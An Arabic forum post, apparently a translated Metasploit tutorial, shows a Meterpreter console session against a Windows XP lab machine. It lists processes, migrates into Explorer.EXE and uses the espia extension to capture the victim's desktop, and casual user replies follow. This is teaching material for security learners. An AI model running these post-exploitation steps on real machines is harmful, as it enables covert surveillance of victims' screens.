Meterpreter Screen Capture - MSF Arabic

مع التحديثات الجديدة لبرنامج الميتـا سبلويت (3.3) واضافة بعض الاعمال المعلقة الجميلة من فريق تطوير البرنامج , تعلمت في الـفصول السابقة قوة الـ Meterpreter
. والاضافة الجميلة الان في البرنامج وهي قدرته على تصوير سطح مكتب الضحية وحفظها في النظام الخاص بك . دعونا نأخذ نظرة بسيطة عن كيفية عمل هذه الميزة الجميلة , مع الافتراض اننا الان لدينا Meterpreter Console بمعنى لدينا ضحية والان نحن في داخل الاستغلال [Exploiting] … سوف ناخذ نظرة بسيطة عن سطح المكتب الخاص بالضحية . ddd



Started bind handler 
[li] Trying target Windows XP SP2 - English...  
[/li][li] Sending stage (719360 bytes)  
[/li][li] meterpreter session 1 opened (192.168.1.101:34117 -> 192.168.1.104:4444) 
[/li]meterpreter > ps Process list ============ PID Name Path --- ---- ---- 
180 notepad.exe C:\WINDOWS\system32
otepad.exe 
248 snmp.exe C:\WINDOWS\System32\snmp.exe 
260 Explorer.EXE C:\WINDOWS\Explorer.EXE 
284 surgemail.exe c:\surgemail\surgemail.exe 
332 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe 
612 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 
620 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 
648 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe 
664 GrooveMonitor.exe C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe 
728 WZCSLDR2.exe C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe 
736 jusched.exe C:\Program Files\Java\jre6\bin\jusched.exe 
756 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe 
816 smss.exe \SystemRoot\System32\smss.exe 
832 alg.exe C:\WINDOWS\System32\alg.exe 
904 csrss.exe \??\C:\WINDOWS\system32\csrss.exe 
928 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe 
972 services.exe C:\WINDOWS\system32\services.exe 
984 lsass.exe C:\WINDOWS\system32\lsass.exe 
1152 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe 
1164 svchost.exe C:\WINDOWS\system32\svchost.exe 
1276 nwauth.exe c:\surgemail
wauth.exe 
1296 svchost.exe C:\WINDOWS\system32\svchost.exe 
1404 svchost.exe C:\WINDOWS\System32\svchost.exe 
1500 svchost.exe C:\WINDOWS\system32\svchost.exe 
1652 svchost.exe C:\WINDOWS\system32\svchost.exe 
1796 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe 
1912 3proxy.exe C:\3proxy\bin\3proxy.exe 
2024 jqs.exe C:\Program Files\Java\jre6\bin\jqs.exe 
2188 swatch.exe c:\surgemail\swatch.exe 
2444 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe 
3004 cmd.exe C:\WINDOWS\system32\cmd.exe 
meterpreter > migrate 260 
[li] Migrating to 260... 
[/li][li] Migration completed successfully. 
[/li]meterpreter > use espia Loading extension espia...success. 
meterpreter > screengrab Screenshot saved to: /root/nYdRUppb.jpeg 
meterpreter >


التطبيق في الاعلى كان على ويندوز XP SP2 من خﻻل باي لود الـ Meterpreter
طبعا شايفين الاوامر في الاعلى الان تم حفظ الصورة في مجلد /root في النظام الخاص بك … هو يفترض انه انت تطبق من نظام لينكس … !
مسـار الصورة :


/root/nYdRUppb.jpeg  

ونستطيع ان نرى مدى فاعلية هذا البرنامج خاصة مع تطبيق الـ explorer.exe
في أنظمة ويندوز … اللي هي تستخدمه كـ سطح مكتب
تأكد من ان العملية [the process] التي يعمل عليها Meterpreter مفعلة وبالاضافة الا انها مسموح لها بالعمل لتفعيل خصائص سطح المكتب … او هذا لن يعمل . ddd

ما رأيكم … استمر بالترجمة ام ﻵ ؟ ddd

wWw.Sec4Ever.CoM
Translated by z1d
./b0x eek

حلو حلو

الله يعافيك يابو زيدوو

ونعم الشروحاات

Edit by or4ng man for Zaido

[b]حلو حلو

الله يعافيك يابو زيدوو

ونعم الشروحاات

Edit by or4ng man for Zaido [/b]

ابو اورنج حبيب الشعب منوور :stuck_out_tongue:
امااااااااااااااا > سعودية ض1

Developed By Orange Man To Abo-ZaIdOo :stuck_out_tongue:
هذي الجملة صح احسن ما تسرق الحقوق اعرفك ض2

اه يا **د :d

قوية منك ولاكن الطريقة مش قوية بمعني الكلمة :d

[b]

[b]اه يا **د :d

قوية منك ولاكن الطريقة مش قوية بمعني الكلمة :d [/b]

ههههههههههههههه
انت دائما ردود الاحباط تيجي معاك ياحج :stuck_out_tongue:
هو اصلا الـ Meterpreter :stuck_out_tongue: صنع لكي لا يعمل ض2[/b]

ههههههه مضبوطة و جميلة.

لكن يمكن اصح من اجل يعمل في الشبكات المحلية ddd .

شكرا زيد على الموضوع